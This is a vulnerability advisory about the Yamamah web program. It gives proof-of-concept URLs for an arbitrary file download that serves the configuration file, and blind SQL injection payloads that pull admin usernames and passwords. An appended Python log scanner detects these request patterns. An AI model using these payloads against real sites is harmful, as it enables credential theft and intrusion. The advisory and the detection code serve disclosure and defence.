Yamamah SQL injection and code-disclosure vulnerability (vulnerability warning)

2010-06-20T00:00:00
ID MYHACK58:62201027298
Type myhack58
Reporter Anonymous
Modified 2010-06-20T00:00:00

Description

The Yamamah website program has a SQL injection vulnerability and an arbitrary file download vulnerability that discloses source code.

File download code disclosure vulnerability: EXP

http://127.0.0.1/yamamah/index.php?download=(file name)

For example: http://server/[variable-path]/index.php?download=includes/config.inc.php

SQL injection: EXP

http://www.hack58.com/yamamah/?news=1[SQL injection statement]

PoC:

http://server/yamamah/?news=1+and substring(@@version,1,1)=5 --> True

http://server/yamamah/?news=1+and substring(@@version,1,1)=4 --> False

http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,username%29,1,1%29%20from%20admin%20limit%200,1%29=1

http://server/yamamah/?news=1+and%20%28select%20substring%28concat%281,password%29,1,1%29%20from%20admin%20limit%200,1%29=1
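
For detection, the following added example (not part of the original advisory or of Yamamah) flags both request patterns in web server access logs. The combined log format, the rule that a legitimate news value is a plain integer, the list of blocked download extensions, the file name report.pdf and all sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate download never names server-side code, the
# includes/ directory, an absolute path, or a path that climbs upward.
BAD_DOWNLOAD_RE = re.compile(
    r'(\.\.|^/|^includes/|\.(php\d?|phtml|inc|ini|sql)$)', re.I)


def classify(line):
    """Return the list of findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # keep_blank_values so that an empty parameter is still inspected
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    findings = []
    for value in params.get("news", []):
        # Assumption: news is a numeric article id; anything else is suspect.
        if not re.fullmatch(r"\d+", value.strip()):
            findings.append("news-not-integer")
    for value in params.get("download", []):
        # Decode a second time to catch double-encoded path separators.
        path = unquote(value).replace("\\", "/").strip()
        if BAD_DOWNLOAD_RE.search(path):
            findings.append("download-source-file")
    return findings


def scan(lines):
    """Return (line index, findings) for every line with at least one finding."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]


# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Jun/2010:10:00:01 +0000] "GET /yamamah/?news=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Jun/2010:10:00:05 +0000] "GET /yamamah/?news=1+and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Jun/2010:10:00:09 +0000] "GET /yamamah/index.php?download=includes/config.inc.php HTTP/1.1" 200 734',
    '203.0.113.4 - - [20/Jun/2010:10:00:12 +0000] "GET /yamamah/index.php?download=report.pdf HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOG):
        print(index, findings)
```

A 200 response to a flagged download request for includes/config.inc.php means the configuration file was served, so any credentials stored in it should be rotated.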